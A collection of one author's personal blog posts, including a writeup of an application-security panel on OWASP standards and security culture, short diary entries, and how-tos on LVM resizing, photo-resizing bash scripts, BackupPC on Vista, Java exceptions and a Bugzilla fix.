The whole event was live-streamed, [watch the panel discussion recording here](https://www.youtube.com/watch?v=FH5kyUwRZ5Q)
For me who lives in developer-land, it was a useful broadening of perspectives around app security. What follows are some bits that I took away from the discussions, which I think provide a useful starting point for anyone tasked with running any modern software systems in this increasingly hostile security environment.
### Who's who at the event
The speakers at the event were as follows:
1. Intro from [<NAME> (eSynergy)](https://www.linkedin.com/in/ulrikeeder/) [00:03:47]
2. "Beyond OWASP Top 10" from [<NAME>](https://www.linkedin.com/in/rewtd/) from OWASP and [secure delivery](https://securedelivery.io/) <EMAIL>](https://defcon.social/@rewtd) / [@rewtd](https://twitter.com/rewtd) [00:06:37]
3. Grant was then joined for the panel discussion by: [00:19:40]
- [<NAME>](https://www.linkedin.com/in/salman-iqbal-a6a5b026), Principal Consultant, DevOps and ML Security at esynergy (hosting the panel)
- [<NAME>](https://www.linkedin.com/in/yayiwu/) VP Engineer at J.P. Morgan
- [<NAME>](https://www.linkedin.com/in/ben-burdsall-6ba2bb), Chief Technology Officer at dunnhumby, non-exec at eSynergy
- [<NAME>](https://www.linkedin.com/in/tomtechharris/) Chief Technology Officer at ClearBank, BuildCircle, ex-JustEat
## Takeaways
There's a bewildering array of things you can / should / must do for the security of your systems, users and company.
Within this article you'll find some starting points for your onwards security journey
### Levels
There are two reasons for thinking of security in layers or levels:
1. Your business needs, risks, regulatory environment and finances
2. Your security maturity
Some businesses are more at risk such as banks and thus need (and can afford) a more significant investment in security measures (such as multi-layered cloud infrastructure defenses), whereas some have less budget and less risk and so can operate at the simpler levels of security.
If you are currently very poor on security then there's little point sprinkling some advanced things on top, it's important to properly address each layer of security capability on the way up.
Regardless of your business needs, perfect security is always an unattainable ideal, but a worthy target nonetheless. The Unicorn project calls this kind of never-quite-attainable perfection an "Ideal". [The Unicorn Project and the Five Ideals: Interview with Gene Kim](https://www.infoq.com/articles/unicorn-project/)
### Who's job is security anyway?
- The directors are "accountable".
- The developers, product etc. are "responsible".
While developers can and should write "secure code" (SQL Injection vulnerabilities is still on the top 10 list), it's important that everyone plays their part.
Notably the product function ("product owners"), as they are the decision makers for balancing the competing demands placed on delivery/development teams, including how much to invest in security defenses. (Much nodding in the audience at this one!)
#### Developers
Tools help but the developers need to understand what is required.
At ClearBank there is:
- "Lunch and learn" sessions from AppSec team.
- Training with "[HackSplaining](https://www.hacksplaining.com/)".
### How ClearBank leveled-up app dev security
1. Added security training
2. Required pull-request approval from someone with security training
3. This created a temporary bottleneck, which encouraged everyone to do the security training
4. Incubated an AppSec team to "reduce the cognitive load of security in collaboration with CISO and CTO (Tom)
1. Enthusiastic internal devs
2. Additional external resource
5. Collaboration at the top then filters down to all the teams
### Justifying security investment
The board of directors now face **criminal** penalties (i.e. jail time) if they don't properly approach security. It used to be just financial penalties but that wasn't enough as they could just be absorbed as a "cost of doing business".
If you need the C-suite or board to take security sufficiently seriously you can remind them of the legal penalties and costs!
- Do security right because it's the right thing to do and you care about your customer and their data.
- There's the "daily mail test" - how would we feel if there was a breach and it hit the papers?
- Put a cost on breaches, e.g. probability of breach multiplied by cost of breach.
- Use the "house fire" analogy. No-one thinks that insuring your house against fire is a bad investment. The same is true for investing in security before you have a incident or breach.
### Lead from the top
Leaders should do the training too, no-one is too important and it sets the tone and culture, encouraging everyone down to the devs to do the training too.
### Shift left
> Shift Left: "take a task that's traditionally done at a later stage of the process and perform that task at earlier stages"
> ~ <https://devopedia.org/shift-left>
Move security left. Nuff said. Dev+Security not Dev versus Security.
Check security and licenses at build time. Gives assurance of security for customers.
### The Top 10 is not enough
The [OWASP Top 10](https://owasp.org/Top10/) is a good tool for awareness and generating conversations, but addressing these is only the lowest "level" of security.
A much broader view of security is provided by the [OWASP Application Security Verification Standard](https://owasp.org/www-project-application-security-verification-standard/) (ASVS). It is also broken down into levels to allow you to start at the bottom and work up as your security capabilities mature, and decide what level your business needs to attain based on the relevant risks and regulations. Banks for example would go all the way to level 3.
There are also per-environment lists. E.g. [OWASP Mobile Application Security](https://mas.owasp.org/) for mobile app development.
### Pen tests
Don't just tick off "pen test", ask your pen test providers how they work.
- Do they just cover the OWASP Top 10?
- Do they just cover the SAMM Top 20?
- Do they go deeper than the Top-n?
- Do they look at ASVS?
- What tools do they use?
- Do the tools report against the ASVS? (If not talk to the tool provider!)
### Threat modelling
Use threat modelling, assess and then defend against that.
### Red/blue teams
Can be effective, but also very expensive. Do the basics first (e.g. sql-injection training!)
### Tools & resources to level-up security
- Training and assessments from [Secure Delivery](https://securedelivery.io/). They provide security training and assessments for everyone in the business, not just developers.
- [OWASP Software Assurance Maturity Model](https://owaspsamm.org/) (SAMM) A "measurable way for all types of organizations to analyze and improve their software security posture"
- [Slim Toolkit](https://github.com/slimtoolkit/slim) - had a massive impact in reducing vulnerabilities at dunnhumby.
- [HackSplaining](https://www.hacksplaining.com/) Security training, "Learn to Hack". In use at ClearBank.
- [Snyk](https://snyk.io/) (pronounced "sneak") - security integrated with CI pipelines
- Bug Bounties - good bang for buck, often find privilege escalation at the app level, even for as little as £3k per found vulnerability.
- [OWASP Cornucopia physical card game](https://owasp.org/www-project-cornucopia/) (also available online - [cornucopia online](https://cornucopia.dotnetlab.eu/), [cornucopia game source code](https://github.com/OWASP/cornucopia))
- [OWASP London Chapter Meetups](https://www.meetup.com/OWASP-London/)
### AI, LLMs & ChatGPT
There are new threats and risks with the new AI tools:
- Developers incorrectly using information provided by the LLMs
- ChatGPT allows attackers to accelerate, particularly social engineering. E.g. asking ChatGPT for an org chart instead of having to trawl for data manually, then using that in social engineering attacks. This might make it quicker for an attacker to use someone's manager's name to lend authority.
- Developers etc accidentally exfiltrating sensitive data such as private keys and passwords by providing it as inputs to an LLM such as ChatGPT that then integrates the data into its model in a way that allows extraction by a malicious third-party.
Currently use of ChatGPT is blocked at some big companies.
The change to the security landscape is a bit like asking "how did the creation of the internet change theft".
OWASP has used LLM technology to help make it easier for clients to decide which of the 150 tools they have are most appropriate.
<file_sep>---
layout: post
title: Blocking web adverts
date: '2007-07-02T21:23:00.000Z'
author: <NAME>
tags:
- howto
- firefox
modified_time: '2008-07-26T15:33:40.548Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-563864958843610830
blogger_orig_url: https://timwise.blogspot.com/2007/07/blocking-web-adverts.html
---
A friend asked me to write this up.
To remove all those annoying adverts from the web as you see it:
* install & use [firefox](http://www.mozilla-europe.org/en/products/firefox/)
* install [adblock plus](https://addons.mozilla.org/en-US/firefox/addon/1865) add-in
* install [fliterset-g updater](https://addons.mozilla.org/en-US/firefox/addon/1136) add in
Job done. Thanks for listening.
<file_sep>---
title: "morning"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63297/morning
---
<p>urgh. I'm up already, going swimming today.<br>I'm going to have to start running soon, not looking forward to that at all.<br>I've heard that Ellen has sorted herself out and is about to get married. Go girl!<br>Smoking is a filthy habit and it's starting to annoy me when people smoke in my space, guess I'd better go find my slippers and look after that comb-over.<br>Right. I'm off to shower.<br>xx<br>Tim</p>
<file_sep>---
layout: post
title: LVM + ReiserFS for the win
date: '2011-10-25T06:17:00.002Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
- lvm
modified_time: '2011-10-25T06:20:59.060Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-149678347610055760
blogger_orig_url: https://timwise.blogspot.com/2011/10/lvm-reiserfs-for-win.html
---
LVM + ReiserFS for the win!
It's so easy to add more space
```
root@atom:~
# lvextend -L +100G /dev/vg2/local
Extending logical volume local to 200.00 GiB
Logical volume local successfully resized
root@atom:~
# resize_reiserfs /dev/vg2/local
resize_reiserfs 3.6.21 (2009 www.namesys.com)
resize_reiserfs: On-line resizing finished successfully.
root@atom:~
# df -h /dev/mapper/vg2-local
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg2-local
200G 18G 183G 9% /media/local
root@atom:~
```
<file_sep>---
title: "Swimming"
date: 2004-01-06
slashdot_url: https://slashdot.org/journal/57382/swimming
---
<p>Did exactly 20 lengths today in just 35 mins. then cycled all the way home to sort out this laptop.</p>
<p>Good timing on the laptop, I'd just brought it home when the system partition on my only other box just completely failed. The system then wouldn't boot at all. So I chucked in a small disk with a working 2k install as a primary master, check disk then kindly removed 70% of the files on my main system partition. Woop. Hello linux.</p>
<file_sep>---
title: "Swimming"
date: 2003-12-11
slashdot_url: https://slashdot.org/journal/54782/swimming
---
<p>16 lengths in half hour. not bad. (400m)<br>still haven't had enough sleep.</p>
<p>boo for Quake 3 keeping me up.</p>
<file_sep>---
layout: post
title: Quote of the day - scrum progress updates
date: '2012-02-14T10:30:00.001Z'
author: <NAME>
categories: [scrum, quote, agile]
modified_time: '2012-02-14T10:31:53.809Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6754555683725994021
blogger_orig_url: https://timwise.blogspot.com/2012/02/quote-scrum-progress-updates.html
---
Quote of the day
[<NAME>](http://www.scrumalliance.org/profiles/14884-mikko-wilkman) said
on 05 Jan 09 07:15:
> ... Even a one hour task might change to an eight hour task (or multiple
> tasks..) due to new information found out during that one hour that was the
> original estimate. The key point is not to focus on how many hours the team
> got done on the task, but how many hours really are remaining. The daily
> update should never be: "I worked on that for four hours, so you can take
> four hours out of the estimate", but rather a real estimate on how much work
> still needs to be done based on current knowledge.
from
[http://www.scrumalliance.org/articles/39-glossary-of-scrum-terms#1110](http://www.scrumalliance.org/articles/39-glossary-of-scrum-terms#1110)
<file_sep>---
layout: post
title: Dustbin of ideas - IT Contractor Buddy
date: 2017-05-12 12:32:07.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '4968885356'
_oembed_b18e108ecbda6b213fbf652d7abfff20: "{{unknown}}"
_oembed_0422473dff236b3c5dada18fd5a04f01: <a href="https://www.flickr.com/photos/tim_abell/32091991176/"><img
src="https://farm1.staticflickr.com/765/32091991176_0f19b14a2f.jpg" alt="New cycle
route, green park - closed at night, wtf" width="500" height="374" /></a>
_oembed_time_0422473dff236b3c5dada18fd5a04f01: '1510990525'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/05/12/dustbin-of-ideas-it-contractor-buddy/"
---
I've talked to a couple of people experienced in the recruitment industry and it appears that the [contractor buddy](http://blog.timwise.co.uk/2017/05/03/it-contractor-buddy/) business idea has some fatal flaws and is unlikely to succeed.
You might be surprised to hear that I consider this a success on my journey to startup success.
* I've had a business idea (not an easy thing to do!) which is more realistic than many of my previous ideas showing that my ability to spot such opportunities is improving. (It has a clear revenue model and its fairly easy to see how it could be built.)
* I've not become too attached to it to hear valid criticism.
* By putting it out there and discussing it openly with anyone willing to help me out I've rapidly found the flaws in it without wasting valuable time or money. (Imaging if I spent two years building it to then have the same flaws sink it.)
* I've managed to find contacts from a broad range of backgrounds who have helped me to crystallize my idea - this is entirely thanks to spending time at the fabulous co-working and startup community space [grow@greenpark](https://growgreenpark.spaces.nexudus.com/en).
So what sank it?
* Even though the company would not be inserted into the financial transaction, they would still need to be a communication relay between employer/agent and candidate, and the received opinion is that this just won't fly.
* The number of contractors who could find this useful could be small, with the highly in-demand people not having to put in much work to get the next contract (therefore not gaining much value from the service), and the the not-in-demand contractors are not a market the business would want to be primarily associated with as it could become a by-word for low-quality talent. This leaves the middle ground which may not be enough of a market to support the business. Before I'd talked to anyone I'd assumed that all contractors would want this (based on sample size of one - me).
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/32091991176/" title="New cycle route, green park - closed at night, wtf"><img src="https://live.staticflickr.com/765/32091991176_0f19b14a2f.jpg" width="500" height="374" alt="New cycle route, green park - closed at night, wtf"></a>
</div>
The investment required to prove/disprove these suppositions would be significant, as I think you'd basically have to build the functioning business to see what happens in reality. So on that basis, "I'm out!"
So what now?
Well there's my [Sql Data Viewer](http://blog.timwise.co.uk/sdv/) that I haven't given up on (check it out, let me know what you think and join the mailing list).
There's also the possibility of a [pivot](https://www.startupgrind.com/blog/is-pivot-the-new-fail/). Maybe there's room for something to help contractors without getting in the middle? Maybe it could send mail using their real email address and handle responses? Maybe there's already something like that out there and I should just use it instead of trying to invent my own! Let me know in the comments if you know of anything or already have ways to ease the pain.
Thanks for listening.
<file_sep>---
layout: post
title: Preparing photos for a digital picture frame
date: '2007-12-28T19:28:00.003Z'
author: <NAME>
tags:
- photography
- howto
- ubuntu
- hardware
- linux
- script
- oss
modified_time: '2008-10-04T23:47:09.540Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8312628495426408900
blogger_orig_url: https://timwise.blogspot.com/2007/12/preparing-photos-for-digital-picture.html
---
Challenge of the day was to fit as many photos as possible on a single flash
card to stick in a digital photo frame. Here's how it's done.
The frame from Philips goes by the memorable name of
[9FF2M4](http://www.consumer.philips.com/consumer/en/ca/consumer/cc/_productid_9FF2M4_37_CA_CONSUMER/)
, and by way of a quick review it is very nice. If I were a normal person, I
would probably have copied the original 2.5MB / 5 megapixel images to the
frame's flash card (1GB Compact Flash in this case, though it can take others),
and put up with not being able to fit *all* the photos on, and having some of them show sideways. But
being a perfectionist I instead sacrificed precious sleeping time to figure out
what to do. In the end I managed to trim the files down to around 200KB each,
and put portrait photos on a black background the right way up in order to save
neck ache from squinting at a sideways eiffel tower. This was all done by the
power of OSS and bash scripting. Here I present for your convenience the
methods I used, and highlight some of the useful things I picked up along the
way.
The first thing that taxed me was what size the photos needed to be to display
best whilst taking up minimal space. You would think the answer would be
emblazened on the product's box, but no! Philips don't seem to be too keen on
promoting the resolution of the display, and even the shop keeper struggled to
give me a number. The owner's manual states: "Resolution: 800 x 480 pixels
(viewing area 680 x 480)" but after some time experimenting with test images
created with [the gimp](http://gimp.org/) I came to the conclusion that it was
impossible to get the frame to display an image pixel perfect as it seemed to
be re-scaling every picture regardless of original size. There appears to be no
guidance from Philips as to what a good resolution for the photos would be, so
after some experimentation I settled on 800x600 as this is slightly higher than
the frame's native resolution, and fills the screen nicely without loosing too
much off the edges when displayed.
The frame does not appear to read orientation from the exif data so I looked
into rotating all the portrait images to display correctly. I am using the
frame in its landscape orientation as that is the form of most of the photos,
even though it can be placed in portrait orientation. When a portrait photos is
displayed (eg 480x600), the frame puts a fair amount of the image off the top
and bottom of the display, and by default puts it on a full white background
which is a little hard on the eyes and detracts from darker photos. I therefore
opted to create landscape images of 800x600 with a black background for all the
portrait photos. I later discovered that you can on this frame change the
background colour as follows: Main menu > Slideshow > Background colour > White
/ Black Grey.
The process I have used is a little specific to my setup and needs, but
hopefully will give you a good starting point. I have created 3 bash scripts
that call each other to orchestrate the conversion from my raw photo collection
to a new set suitable for the frame, which in turn make use of imageMagick and
exiftran to do the work.
I found out about [imageMagick](http://www.imagemagick.org/) through searching,
and tutorials such as [HowTo - Batch Image Resize on
Linux](http://www.smokinglinux.com/tutorials/howto-batch-image-resize-on-linux).
The version packaged with Ubuntu 7.10 is quite old, so I ended up building and
installing the latest version (6.3.7) from source to get all the functionality
I needed.
`exiftran` is a nifty utility that reads the exif orientation information in a
photo, losslessly rotates the photo to match and then updates the exif data. It
is closely related to `jpegtran`.
My folder structure in my home folder (so the scripts make sense):
* scripts (for bash scripts)
* photos (originals)
* 2005
* 2005-12-31 event name
* etc
* 2006
* etc
* photos_frame (for the modified and shrunk photos which will be copied onto the flash card)
So without further ado, here's the scripts:
**frame.sh** - runs the processing scripts on each year folder of interest
#!/bin/bash -v
~/scripts/frame_photo_folder.sh 2005 ~/photos_frame/
~/scripts/frame_photo_folder.sh 2006 ~/photos_frame/
~/scripts/frame_photo_folder.sh 2007 ~/photos_frame/
**frame_photo_folder.sh** - runs the processing script on subfolder of the year
#!/bin/bash
#arg 1 = input folder
#arg 2 = output folder
INPUTPATH=$1
OUTPATH=$2
cd $INPUTPATH
if [ ! -d "$OUTPATH$INPUTPATH" ]
then
echo creating output folder \"$OUTPATH$INPUTPATH\"
mkdir $OUTPATH$INPUTPATH
fi
for fname in *
do
if [ -d "$fname" ]
then
if [ ! -d "$OUTPATH$INPUTPATH/$fname" ]
then
echo creating output folder \"$OUTPATH$INPUTPATH/$fname\"
mkdir "$OUTPATH$INPUTPATH/$fname"
fi
echo searching for jpg files in \"$fname\"
cd "$fname"
find . -maxdepth 1 -type f -name \*.JPG | xargs -iimgfile ~/scripts/frame_photo.sh "imgfile" "$OUTPATH$INPUTPATH/$fname"
cd ..
fi
done
**frame_photo.sh**
* creates output folder(s)
* copies original photo into output folder
* uses exiftran to rotate the photo to the correct orientation
* shrinks the photo to a maximum of 800x600, and fills any remaining space with a black background
```
#!/bin/bash
#arg 1 = photo file name
#arg 2 = where to put result
#resizes and pads suitable for a photo frame.
INPUTFILE=$1
OUTPATH=$2
#pwd
echo copying \"$INPUTFILE\" into \"$OUTPATH\"
cp "$INPUTFILE" "$OUTPATH"
cd "$OUTPATH"
#pwd
#echo processing \"$INPUTFILE\"
exiftran -ai "$INPUTFILE"
convert "$INPUTFILE" -resize '800x600>' -background black -gravity center -extent 800x600 "$INPUTFILE"
```
I timed the whole operation using the time command, and copied all output to a
log file as follows.
$ time ./frame.sh 2>&1 | tee frame.log
The conversion of around 6000 photos took around one and a half hours.
The concept of redirection of stdout & stderr was neatly explained by the
article [CLI magic: need redirection?](http://www.linux.com/articles/113686),
so now I know that 2>&1 means redirect ouput number two into output number one,
in other words redirect stderr into stdout, which then alows you to pipe the
whole lot into something else like "tee" (No, not tea, though it may be
interesting redirecting my photos into my tea...)
Add a comment or drop me a line if you find it interesting or useful or if you
have any questions or criticisms.
Update: I've worked this script into a small python gui app, check it out at
[http://github.com/timabell/photo-frame-prep](http://github.com/timabell/photo-frame-prep)
<file_sep>---
title: "i still hate sundays"
date: 2005-07-03
slashdot_url: https://slashdot.org/journal/110984/i-still-hate-sundays
---
<p>having worked another six day week, I discover that I now can't do anything I had to do on my day off. Namely involving post office for ebay (shut), barclays for a new account (shut) and registering at the health centre (open 9-5 mon-fri, which is no frickin good at all). piss. guess I'll just go buy shoes at the oracle cos that's all that's open. maybe I'll try to move my hours to work sunday. not.</p>
<file_sep>---
title: "email security / lack of"
date: 2005-01-25
slashdot_url: https://slashdot.org/journal/96534/email-security--lack-of
---
<p>I will soon start digitally signing my email for reasons similar to this:<br><a href="http://www.linuxmafia.com/~rick/linux-info/rant-gpg">http://www.linuxmafia.com/~rick/linux-info/rant-gpg</a><br>If it bothers you then I may send you copies of the included rant. And if you don't like it then you will lose your right to complain when someone sends email spoofed from your address<nobr> </nobr>:-)</p>
<p>If you want a good alarm clock / hifi I can recommend my latest <a href="http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&rd=1&item=5746472812&ssPageName=STRK:MESE:IT">eBay listing</a>.</p>
<p>Tim</p>
<p>PS.</p>
<p>Grrrrrrrrrrr.</p>
<file_sep>---
title: "Hello reader"
date: 2003-10-15
slashdot_url: https://slashdot.org/journal/49186/hello-reader
---
<p>I found out what my mysterious payment from egg was this evening.<br>Cashback is now paid straight into current account (I like!)<br>so I am 28 quid richer for spending all my money through egg.<br>woo!<br>I think that's way more than I earnt in interest on my savings.</p>
<p>TMF bunch would be proud of me.</p>
<file_sep>---
layout: post
title: backuppc and windows vista
date: '2009-10-23T01:51:00.005Z'
author: <NAME>
tags:
- howto
- backup
- vista
- windows
- linux
- wip
modified_time: '2009-10-24T22:29:34.727Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1285384210635406754
blogger_orig_url: https://timwise.blogspot.com/2009/10/backuppc-and-windows-vista.html
---
Steps I took to get a [backuppc](http://backuppc.sourceforge.net/) server on an
ubuntu 8.10 pc in order to be able to back up a windows vista business pc. I've
only documented the non-obvious and undocumented items here.
* Added a user called backup to the vista pc.
* Added the backup user to the "administrators" group. I tried the "backup
operators" group but it didn't give access to the user profiles. It looks
like robocopy has some black magic that allows it to bypass ACLs when a
member of backup operators.
* Enabled admin shares (ie `\\machine\C$`) by adding `DWORD` registry key
`LocalAccountTokenFilterPolicy` to
`HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System`
and setting the value to `1`. See [How to access Administrative Shares on
Vista
(C$)](http://www.paulspoerry.com/2007/05/09/how-to-access-administrative-shares-on-vista-c/)
by PaulSpoerry
* Removed the `-N` from the `SmbClientFullCmd` etc options in backuppc's
transfer (`xfer`) settings as it didn't seem to be using the provided
password. Troubleshooting was aided by running
`/usr/share/backuppc/bin/BackupPC_dump -v -f vistamachine` directly as user
backuppc.
* [Hide the backup
user](http://forums.techarena.in/vista-administration/689162.htm#post2788050)
from the welcome screen by adding `DWORD`
`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\backup` with value `0`
to the registry. "backup" is the name of the user to hide, `0` means hide,
`1` means show.
Enjoy.
See also:
* [ubuntu backuppc/vista
guide](https://help.ubuntu.com/community/BackupPC/smb)
Current status: This has only been partially successful so far. The backup runs
but has lots of files missing due access denied errors on many of the important
folders. It looks like I will have to manually give "backup operators"
permissions to these folders. Sigh. Vista is proving to be less than easy for
me to support.
<file_sep>---
layout: post
title: Java checked and runtime exceptions and how to transition
date: '2013-04-02T21:25:00.000Z'
author: <NAME>
tags:
modified_time: '2013-04-02T21:37:03.810Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2601004754756824237
blogger_orig_url: https://timwise.blogspot.com/2013/04/java-checked-and-runtime-exceptions-and.html
---
As primarily a C# programmer I've never been sold on checked exceptions, mostly seeing them as an unnecessary nuisance forcing programmers to introduce reams of boilerplate `throws` / `try-catch` blocks into their consuming code to propagate these exceptions up the stack.
Whilst coding on [https://github.com/timabell/FreeTTS](https://github.com/timabell/FreeTTS) I was forced to deal with this personal demon.
I've read that checked exceptions are a way of making exceptions be part of the declared API for some class or library, and that it forces client programmers to handle error conditions that the API programmer knows are likely to occur (e.g. the library relies on the filesystem internally so declares it throws a `IOException` when calling a relevant method.
I have some sympathy with this idea and can see how it can allow for more robust code when done well. My experience has generally been that it is not handled well and the reaction is to add a lot of meaningless code or to throw away the exception and hide the problem, causing difficulties troubleshooting later.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8278346178"><img
src="https://live.staticflickr.com/8337/8278346178_3bcf551666.jpg" alt="Photo of fungus on a tree"></a>
</div>
When I've been in control of the API I've been tempted to always throw runtime exceptions and avoid the problem entirely, however this time whilst working on someone else's class I came across a call to an external library that threw an `IOException` which I couldn't change. This made me think a bit harder about the problem. I initially thought my options were to immediately catch and rethrow as a runtime exception or to add `throws IOException` / `throws Exception` to every piece of the call chain.
I tried the latter approach of propagating the `throws` up through many layers, which although messy did work; right up until I hit a call within a `toString()` method, which is defined by `Object` and doesn't allow you to change the API of the method (by adding a checked exception).
Incidentally I think that having `toString()` rely on code that could throw a file system exception like this did is a dodgy design, but that wasn't my code and would have been a large rewrite.
So after a bit of grumbling to myself I looked more closely at the fault line between the checked exception being thrown and the rest of the codebase.
The existing code was just ignoring the error with `catch {}` (shudder) and returning `null`, making it hard to troubleshoot a failing JUnit test.
I think the answer to the conundrum is that for each method in the chain you have to decide if callers of the method could usefully handle the error condition, or whether they could add any useful information to the stack trace to assist troubleshooting. Here's roughly the approach I've taken which I think should be illustrative:
Method that throws
String getSomething(string filename) throws IOException
{
// do some file IO
return someData;
}
Next method up. Doesn't compile as checked exception not handled, what to do?
String loadFoo()
{
String foo = getSomething("this.txt");
return foo;
}
In this case I don't think `getSomething` should be the last point in the chain as it doesn't know _why_ it was performing the operation it was. `loadFoo` however knows both the resource being accessed and what the intent was, so can report an exception message that should point someone troubleshooting immediately to the source of the problem and inform them what the program was trying to achieve. Having `loadFoo()` declare that it `throws IOException` doesn't make sense as the caller shouldn't need to know how `loadFoo` gets its data, it's just the kind of noise that programmers dislike Java for. So the answer in my opinion is because `loadFoo()` is best placed to give all the useful information needed to fix the problem, it should catch the checked exception, wrap it in a runtime exception, add a useful message and rethrow it. This saves callers from needing to handle exceptions that they can't usefully deal with, whilst still providing good troubleshooting information. And yet there's still a use for the checked exceptions as `getSomething()` was able to declare that it knew an `IOException` was possible but that it wasn't in a position to give enough useful information.
So the final code I ended up with looked something like this:
String getSomething(string filename) throws IOException
{
// do some file IO
return someData;
}
String loadFoo()
{
String filename = "this.txt";
try
{
String foo = getSomething(filename);
return foo;
} catch (IOException ex) {
throw new RuntimeException("Failed to read foo from '" + fileName + "'", ex);
}
}
## Inversion of control (IoC)
A colleague of mine mentioned IoC as a problem for checked exceptions. This is an interesting point and does complicate things.
## References
* [http://stackoverflow.com/questions/613954/the-case-against-checked-exceptions](http://stackoverflow.com/questions/613954/the-case-against-checked-exceptions)
* [http://stackoverflow.com/questions/27578/when-to-choose-checked-and-unchecked-exceptions](http://stackoverflow.com/questions/27578/when-to-choose-checked-and-unchecked-exceptions)
* [http://stackoverflow.com/questions/1656376/why-are-runtime-exceptions-unchecked-in-java](http://stackoverflow.com/questions/1656376/why-are-runtime-exceptions-unchecked-in-java)
* [http://stackoverflow.com/questions/4639432/checked-vs-unchecked-exception?rq=1](http://stackoverflow.com/questions/4639432/checked-vs-unchecked-exception?rq=1)
* [http://stackoverflow.com/questions/3613422/exception-handling-in-java?rq=1](http://stackoverflow.com/questions/3613422/exception-handling-in-java?rq=1)
* [http://docs.oracle.com/javase/tutorial/essential/exceptions/runtime.html](http://docs.oracle.com/javase/tutorial/essential/exceptions/runtime.html)
<file_sep>---
title: "tim's new blog"
date: 2007-01-07
slashdot_url: https://slashdot.org/journal/158640/tims-new-blog
---
<p>Seeing as blogging has reached the masses I'm going to start writing in a normal blog.<br>I will no longer write in here most likely.</p>
<p>the new url is currently <a href="http://timwise.dyndns.org/">http://timwise.dyndns.org/</a> but we'll see how that goes.</p>
<p>Tim</p>
<file_sep>---
title: "sailing pics"
date: 2006-07-09
slashdot_url: https://slashdot.org/journal/139362/sailing-pics
---
<p><a href="http://timwise.co.uk/photos/sailing06/">http://timwise.co.uk/photos/sailing06/</a></p>
<file_sep>---
layout: post
title: Connecting to smb shares on a domain in gnome
date: '2012-06-11T18:17:00.001Z'
author: <NAME>
tags:
modified_time: '2012-06-11T18:17:38.462Z'
thumbnail: http://2.bp.blogspot.com/-I3lG1lD4ue4/T9Y1-P89FHI/AAAAAAAAAGc/4q0gUYZYccc/s72-c/smb-domain.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-909906901858651246
blogger_orig_url: https://timwise.blogspot.com/2012/06/connecting-to-smb-shares-on-domain-in.html
---
The domain name has to be UPPERCASE otherwise authentication fails.
Majorly confusing.
Time lost: 3 hours.

Sigh
<file_sep>---
layout: post
title: bugzilla upgrades and user tokens
date: '2009-11-08T18:12:00.006Z'
author: <NAME>
tags:
- mysql
- bugzilla
- troubleshooting
- sys admin
modified_time: '2009-11-10T22:28:00.731Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1315274421552207269
blogger_orig_url: https://timwise.blogspot.com/2009/11/bugzilla-upgrades-and-user-tokens.html
---
It's bugzilla upgrade time for my private install, and I have for the second time run into a strange issue with the tokens system. Since this is the second time and I know how to fix it, here it is for the record.
I have upgrade from v3.0.4 to 3.4.3.
Once the site was up again, saving the site parameters (`editparams.cgi`) showed a big red warning:
> It looks like you didn't come from the right page (you have no valid token
> for the *edit_parameters* action while processing the 'editparams.cgi'
> script). The reason could be one of:
>
> * You clicked the "Back" button of your web browser after having
> successfully submitted changes, which is generally not a good idea (but
> harmless).
> * You entered the URL in the address bar of your web browser directly,
> which should be safe.
> * You clicked on a URL which redirected you here **without your consent**,
> in which case this action is much more critical.
>
> Are you sure you want to commit these changes anyway? This may result in
> unexpected and undesired results.
>
> [Confirm Changes]
>
> Or throw away these changes and go back to editparams.cgi.
Pushing the button doesn't work (same page shows again).
After much digging last time I discovered that the tokens it refers to are stored in table bugs.tokens, and that the size of the field is wrong in my installation after the upgrade (again).
```
mysql> use bugs;
mysql> describe tokens;
+-----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------+--------------+------+-----+---------+-------+
| userid | mediumint(9) | YES | MUL | NULL | |
| issuedate | datetime | NO | | NULL | |
| <span style="font-weight: bold;">token | varchar(5)</span> | NO | PRI | NULL | |
| tokentype | varchar(8) | YES | | NULL | |
| eventdata | tinytext | YES | | NULL | |
+-----------+--------------+------+-----+---------+-------+
5 rows in set (0.02 sec)
```
According to the published schema, token should be `varchar(16)`. [http://www.ravenbrook.com/project/p4dti/tool/cgi/bugzilla-schema/index.cgi?action=single&version=3.4.2&view=View+schema#table-tokens](http://www.ravenbrook.com/project/p4dti/tool/cgi/bugzilla-schema/index.cgi?action=single&version=3.4.2&view=View+schema#table-tokens)
To fix the problem I modified the data type as follows:
```
mysql> alter table tokens modify column token varchar(16) not null;
Query OK, 20 rows affected (0.32 sec)
Records: 20 Duplicates: 0 Warnings: 0
```
And then I was able to change my parameters.
[https://bugzilla.mozilla.org/show_bug.cgi?id=527780](https://bugzilla.mozilla.org/show_bug.cgi?id=527780)
<file_sep>---
layout: post
title: Enabling TV-Out on Ubuntu Linux 7.10 on a Dell Inspiron 8500
date: '2007-12-09T01:41:00.001Z'
author: <NAME>
tags:
- howto
- nvidia
- inspiron 8500
- ubuntu
- hardware
- composite video
- linux
- dell
- laptop
- proprietary
- oss
modified_time: '2007-12-09T03:13:46.284Z'
thumbnail: http://farm3.static.flickr.com/2419/2096850378_d98545fdc9_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8211898069521983285
